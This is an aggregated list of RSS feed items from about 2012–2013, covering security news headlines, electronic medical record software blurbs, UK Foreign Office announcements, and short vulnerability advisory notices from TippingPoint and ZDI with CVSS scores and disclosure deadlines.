==> Chinese army hackers return from vacation, renew attacks on US

http://feeds.arstechnica.com/arstechnica/security?format=xml Being outed, public "shaming" by White House only yielded pause in hacks.

==> Financial Times’ Twitter, tech blog hijacked by the Syrian Electronic Army

http://feeds.arstechnica.com/arstechnica/security?format=xml FT is part of a growing list of media companies duped by the Pro-Assad crew.

==> How to Select a Web Host

http://feeds.feedburner.com/Docucrunch?format=xml Creating a new website? Not sure how to choose from among all the options? Need shared hosting, small business hosting, or VPS hosting? Lots of email accounts? 5-star reliability rating? Fortunately, there’s information available to help. The Best Web Hosts is a great resource that will help you select the best web hosting company. It features [...]

==> Lytec MD

http://feeds.feedburner.com/Docucrunch?format=xml Lytec MD is a combination of an electronic health record and a practice management solution (Lytec 2010). It is housed on the practice's server and is intended for practices that already use Lytec 2010 and want to use both EMR and PM features in one package. Lytec MD has received the ONC-ATCB 2011/2012 certification as [...]

==> Intivia InSync

http://feeds.feedburner.com/Docucrunch?format=xml Intivia InSync is electronic medical record software that allows for doctors and staff to coordinate patient care while reducing paper records and time-consuming administrative tasks. It includes all facets of an electronic medical record: document management (scanning old paper records and patient identification), electronic charts and prescribing, practice management (i.e. appointment scheduling), and medical billing. [...]

==> Meditab Intelligent Medical Software (IMS)

http://feeds.feedburner.com/Docucrunch?format=xml Meditab's Intelligent Medical Software (IMS) combines features of both electronic medical records (EMR) and practice management (PM) into one package, a so-called electronic medical office. It is suited for small, medium, and large medical practices and has various packages that are aimed toward specific specialties (i.e. pediatrics, OB/GYN, internal medicine, etc). Practices can choose to [...]

==> iSalus Healthcare OfficeEMR

http://feeds.feedburner.com/Docucrunch?format=xml iSalus Healthcare OfficeEMR is a web-based solution that combines electronic medical record features with practice management functions. It is hosted on iSalus servers so medical practices do not need to purchase any servers, software, or other relevant expenditures. Nor would they have to worry about upgrading any software. They would only need to pay a [...]

==> Noteworthy NetPractice EHRweb

http://feeds.feedburner.com/Docucrunch?format=xml Noteworthy's NetPractice EHRweb is web-based electronic health software that can be used by any practice, regardless of size and specialty. Its Version 7.02.0 has received the ONC-ATCB 2011-2012 designation for Stage 1 meaningful use (which is set by the feds for reimbursement for physicians adopting EMR for their offices). Unlike a traditional EMR, EHRweb allows [...]

==> MicroMD EMR

http://feeds.feedburner.com/Docucrunch?format=xml MicroMD EMR is an electronic medical record (EMR) solution that is not only appropriate for larger practices but for smaller (even solo) practices as well. It combines electronic records and practice management into one system, and is geared toward numerous specialties, such as family practice, pediatrics, internal medicine, and obstetrics and gynecology. The MicroMD EMR [...]

==> Allscripts MyWay

http://feeds.feedburner.com/Docucrunch?format=xml Allscripts MyWay combines electronic medical records (EMR) with practice management and claims management solutions. It is intended for smaller or solo practices that do not have IT staff or do not wish to spend a lot of money on EMRs. MyWay can also be integrated with an office's current practice management software. Currently, MyWay is [...]

==> NextGen: Patient Portal

http://feeds.feedburner.com/Docucrunch?format=xml The NextGen Patient Portal is a Web-based electronic health record (EHR) system that allows patients to be more proactive about their health and physician visits. It also is intended to help busy medical offices, especially smaller practices, cut down on administrative tasks, increase revenue, and provide better quality of care. The Patient Portal is integrated [...]

==> McKesson: Medisoft Clinical

http://feeds.feedburner.com/Docucrunch?format=xml McKesson's Medisoft Clinical software is a combination of both a practice management (via the Medisoft version 17 system) and electronic medical record (EMR) solution. It is intended for small practices with some limited staff that have a need to reduce time-consuming administrative tasks and still provide quality care to patients. Having recently received the Certification [...]

==> TPTI-12-05 - Oracle AutoVue ActiveX SetMarkupMode Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-06 - Hewlett-Packard Data Protector DtbClsAddObject Parsing Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-04 - Samba NDR PULL EVENTLOG ReportEventAndSourceW Heap Overflow Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-03 - Adobe Reader X True Type Font MINDEX Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of an Oracle product.

==> TPTI-12-02 - Novell iPrint Client ActiveX GetPrinterURLList2 Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-01 - Oracle Java True Type Font IDEF Opcode Parsing Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-15 - Novell ZENWorks Software Packaging ISGrid.Grid2.1 bstrSearchText Parameter Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell ZENWorks. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-14 - Adobe Shockwave DEMX Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Shockwave. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-13 - McAfee SaaS myCIOScn.dll Scan Method Script Injection Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of a McAfee product.

==> TPTI-11-12 - McAfee SaaS MyAsUtil5.2.0.603.dll SecureObjectFactory Instantiation Design Flaw Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of a McAfee product.

==> Our website is moving

http://feeds.feedburner.com/FcoLatestNewsRssFeed GOV.UK We will be publishing our information, news and priorities on the new UK government platform GOV.UK.

==> Foreign Office website moved to GOV.UK

http://feeds.feedburner.com/FcoLatestNewsRssFeed GOV.UK The Foreign Office is publishing its news and policy on GOV.UK, the new place to find government information.

==> Minister for Europe renews UK commitment to EU enlargement

http://feeds.feedburner.com/FcoLatestNewsRssFeed Crown Copyright Minister for Europe David Lidington has set out the UK’s continued commitment to EU enlargement following his participation in the General Affairs Council meeting in Brussels on 11 December.

==> North Korean Ambassador summoned to Foreign and Commonwealth Office

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign & Commonwealth Office, Crown Copyright The North Korean Ambassador in London was summoned by the Permanent Under Secretary of State at the Foreign Office following news of the launch of a satellite by North Korea earlier today.

==> Championing Britain through commercial and economic diplomacy

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Secretary (crown copyright) Foreign Secretary William Hague tells British diplomats they must intensify work to champion the UK as a destination for foreign investment.

==> Foreign Secretary remarks at the Friends of Syria meeting

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Secretary William Hague | Crown Copyright The Foreign Secretary William Hague has outlined the immediate responsibilities for the Friends of Syria at the meeting in Marrakesh.

==> Government publishes Afghanistan progress report

http://feeds.feedburner.com/FcoLatestNewsRssFeed Afghan tribesmen take part in celebrations for the solar-based New Year's or Nowruz. GettyImages The Foreign Secretary William Hague has updated parliament on progress in Afghanistan during October 2012

==> Parental Child Abduction is a worldwide problem

http://feeds.feedburner.com/FcoLatestNewsRssFeed Child Abduction New figures reveal that the number of parental child abduction cases dealt with by the Foreign Office has risen by 88% in just under a decade.

==> Foreign Secretary condemns DPRK’s satellite launch

http://feeds.feedburner.com/FcoLatestNewsRssFeed Commenting on the launch of DPRK’s satellite, the Foreign Secretary, William Hague said:

==> UK calls for an immediate return to civilian rule in Mali

http://feeds.feedburner.com/FcoLatestNewsRssFeed Mark Simmonds Foreign Office Minister for Africa Mark Simmonds has tonight underlined his concern over the situation in Mali and called for an immediate return to civilian rule.

==> Obama, Verizon, NSA sued for collecting U.S. citizens' phone call data

http://feeds.feedburner.com/HelpNetSecurity Three individuals have filed the first lawsuit aimed at disputing the constitutionality of NSA's collection of metadata on phone calls made by or to U.S. citizens. Larry Klayman, American attorney ...

==> Reactions from the security community to the NSA spying scandal

http://feeds.feedburner.com/HelpNetSecurity Last week a whistleblower created quite the stir when he leaked documents about PRISM, a surveillance program by the NSA. Below are comments on this scandal that Help Net Security received from a v...

==> Most enterprises have no information strategy

http://feeds.feedburner.com/HelpNetSecurity Less than 10 percent of today's enterprises have a true information strategy, according to Gartner, Inc. Recent research by Gartner has found that, just as business model thinking wasn't mainstream or...

==> ACLU asks spy court to release records on Patriot Act surveillance powers

http://feeds.feedburner.com/HelpNetSecurity The American Civil Liberties Union (ACLU) of Washington and Yale Law School's Media Freedom and Information Clinic filed a motion on Monday with the secret court that oversees government surveillance ...

==> IT consumerization still a threat

http://feeds.feedburner.com/HelpNetSecurity Despite the growing consumerisation of IT, the majority (63 per cent) of employees in the UK say that corporate IT is failing to secure all personal devices brought into the business, according to App...

==> Washington Free Beacon website redirects to malware

http://feeds.feedburner.com/HelpNetSecurity A "big" story like that regarding NSA spying was bound to be used by cyber crooks as a lure. So far, no emails containing links to booby-trapped pages or malicious attachments have been spotted, but I...

==> Researchers find self-propagating Zeus variant

http://feeds.feedburner.com/HelpNetSecurity The Zeus / Zbot Trojan has been around since 2007, and it and its variants continued to perform MitM attacks, log keystrokes and grab information entered in online forms. It is usually spread vi...

==> How businesses prepare for disasters

http://feeds.feedburner.com/HelpNetSecurity With fears of potential security breaches and natural disasters like Superstorm Sandy and the recent Oklahoma tornado weighing heavily on IT executives, businesses nationwide have continued to grow an...

==> Big data is a big priority

http://feeds.feedburner.com/HelpNetSecurity NGDATA shared the results of their survey executed in co-operation with Clear2Pay sharing insights from 183 global bankers around issues like the monetization of mobile payments and the value and re...

==> Mobile application reputation service from Veracode

http://feeds.feedburner.com/HelpNetSecurity Veracode is expanding upon its enterprise application security services to include mobile application intelligence. The introduction of Mobile Application Reputation Service (MARS) will help enterpris...

==> QualysGuard Private Cloud Platform on VCE Vblock Systems

http://feeds.feedburner.com/HelpNetSecurity Qualys announced that the QualysGuard Private Cloud Platform has been integrated with VCE Vblock Systems, helping them secure their networks from cyber attacks and automate compliance. Vblock Syste...

==> Cyber threat hunting service from Dell SecureWorks

http://feeds.feedburner.com/HelpNetSecurity Dell SecureWorks has launched a new Targeted Threat Hunting service aimed at finding cyber attackers who might be lurking in an organization's network, intent on committing a breach. Using cyber ...

==> OS X Mavericks to have 200+ new features

http://feeds.feedburner.com/HelpNetSecurity Apple today released a developer preview of OS X Mavericks, the 10th major release of the world's most advanced operating system. With more than 200 new features, OS X Mavericks brings Maps and i...

==> NSA whistleblower reveals himself, world reacts

http://feeds.feedburner.com/HelpNetSecurity This last week has been the most eventful one in infosec history since I can remember. An (at the time unnamed) whistleblower has rocked the world by disclosing documents that seemingly prove that ...

==> Event: OKTANE13

http://feeds.feedburner.com/HelpNetSecurity OKTANE13 is an identity, security and mobility event. Whether you're just getting started with cloud applications, evaluating a mobile strategy, building a hybrid enterprise IT, or looking to make you...

==> Potential privacy problems for companies accepting Bitcoins

http://feeds.feedburner.com/HelpNetSecurity Businesses accepting Bitcoin payments might want to consider the privacy implications that such an option creates for its customers and for themselves. As you may or may not know, in order to receiv...

==> Video with NSA whistleblower Edward Snowden

http://feeds.feedburner.com/HelpNetSecurity This video features an interview with Edward Snowden, the man behind the most significant intelligence leak in U.S. history. Copyright 2013 Praxis Films / Laura Poitras.

==> QualysGuard Express Lite released

http://feeds.feedburner.com/HelpNetSecurity Qualys announced QualysGuard Express Lite, a small business version of the company's suite of integrated security and compliance solutions. The new cloud offering delivers the full power of the Q...

==> Automating vendor risk management and certification processes

http://feeds.feedburner.com/HelpNetSecurity Qualys announced customizable questionnaires in its QualysGuard Cloud Platform and suite of integrated solutions for security and compliance. Businesses can use the new Questionnaire solution to centr...

==> EU to vote on stiffer penalties for hackers

http://feeds.feedburner.com/HelpNetSecurity Member states of the European Union might soon be creating new laws that will raise minimum prison sentences for convicted cyber attackers and botnet herders. Last week, the European Parliament ...

==> New expert-level cyber forensics certification

http://feeds.feedburner.com/HelpNetSecurity (ISC)2 has developed a new certification, the Certified Cyber Forensics Professional (CCFPSM), as the first global standard for assessing experienced digital forensics professionals' mastery and profe...

==> Dell adds identity to the classification of unstructured data

http://feeds.feedburner.com/HelpNetSecurity Dell Software released Dell Quest One Identity Manager Data Governance Edition Classification Module, the latest solution that adds identity to the classification of unstructured data. While ot...

==> Week in review: NSA spying scandal, EU net neutrality, and vulnerable smart TVs

http://feeds.feedburner.com/HelpNetSecurity Here's an overview of some of last week's most interesting news, reviews, articles and interviews: Google won't allow facial recognition on Glass Whether Google Glass ships out to regular users ...

==> Proposed bill will deny foreign hackers entry into the U.S.

http://feeds.feedburner.com/HelpNetSecurity A day before U.S. President's scheduled meeting with Chinese President Xi Jinping, a new act that aims to punish criminals engaging in cyber spying and theft on behalf of foreign governments has been ...

==> New Android Trojan is complex as Windows malware

http://feeds.feedburner.com/HelpNetSecurity Mobile (and especially Android) malware is on the rise and according to researchers from Kaspersky Lab, its complexity is also increasing. Case in point: Backdoor.AndroidOS.Obad.a. This newly di...

==> Google ups (some) bug bounties

http://feeds.feedburner.com/HelpNetSecurity Google has once again decided to raise the sums that researchers can earn by offering information about bugs in the company's web services and properties (YouTube, Blogger, Orkut, Google Search, and s...

==> Changes to the standard for PIN Transaction Security

http://feeds.feedburner.com/HelpNetSecurity Today the PCI Security Standards Council (PCI SSC) published version 4.0 of the PIN Transaction Security (PTS) Point of Interaction (POI) requirements. These requirements, along with the Hardware Secu...

==> Pirate Bay founder suspected of hacking police databases

http://feeds.feedburner.com/HelpNetSecurity Pirate Bay co-founder Gottfrid Svartholm, who has been extradited from Cambodia to Sweden to answer for allegedly hacking of Swedish IT company Logica and the Nordea bank mainframe has been named as s...

==> SANSFIRE 2011

http://feeds.feedburner.com/SansInstituteAtRiskAll?format=xml SANSFIRE 2011

==> ZDI-CAN-1908: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1905: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Brian Gorenc' and 'HP Zero Day Initiative' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release

==> ZDI-CAN-1895: Splunk

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C) severity vulnerability discovered by 'CyberCrown Ltd.' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1894: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1884: Kaspersky

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'ZombiE' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1865: Splunk

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C) severity vulnerability discovered by 'CyberCrown Ltd.' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1864: Splunk

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C) severity vulnerability discovered by 'CyberCrown Ltd.' was reported to the affected vendor on: 2013-06-10, 0 days ago. The vendor is given until 2013-12-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1897: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-05-24, 17 days ago. The vendor is given until 2013-11-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1896: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-05-24, 17 days ago. The vendor is given until 2013-11-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1892: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Brian Gorenc' and 'HP Zero Day Initiative' was reported to the affected vendor on: 2013-05-24, 17 days ago. The vendor is given until 2013-11-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1885: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-05-24, 17 days ago. The vendor is given until 2013-11-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1870: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-05-24, 17 days ago. The vendor is given until 2013-11-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1869: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-05-24, 17 days ago. The vendor is given until 2013-11-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1866: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Brian Gorenc' and 'HP Zero Day Initiative' was reported to the affected vendor on: 2013-05-24, 17 days ago. The vendor is given until 2013-11-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1880: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-05-14, 27 days ago. The vendor is given until 2013-11-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1879: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'vulnazoid' was reported to the affected vendor on: 2013-05-14, 27 days ago. The vendor is given until 2013-11-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1878: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-05-14, 27 days ago. The vendor is given until 2013-11-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1860: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Tom Gallagher & Paul Bates' was reported to the affected vendor on: 2013-05-14, 27 days ago. The vendor is given until 2013-11-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1812: IBM, IBM

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-05-14, 27 days ago. The vendor is given until 2013-11-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1666: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-05-14, 27 days ago. The vendor is given until 2013-11-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1852: VMWare, Inc.

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-04-26, 45 days ago. The vendor is given until 2013-10-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1851: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-04-26, 45 days ago. The vendor is given until 2013-10-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1850: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-04-26, 45 days ago. The vendor is given until 2013-10-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1834: ABB

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-04-26, 45 days ago. The vendor is given until 2013-10-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1832: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-04-26, 45 days ago. The vendor is given until 2013-10-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1802: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-04-26, 45 days ago. The vendor is given until 2013-10-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1780: WellinTech

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-04-26, 45 days ago. The vendor is given until 2013-10-23 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1553: WellinTech

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-04-26, 45 days ago. The vendor is given until 2013-10-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1552: WellinTech

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-04-26, 45 days ago. The vendor is given until 2013-10-23 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1853: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1849: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1846: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1845: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1844: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-04-16, 55 days ago. The vendor is given until 2013-10-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1831: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1830: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1821: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1820: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1813: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Mil3s beep' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1811: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1809: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1712: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'major_mk' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1710: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'G. Geshev' was reported to the affected vendor on: 2013-03-29, 73 days ago. The vendor is given until 2013-09-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1751: EMC

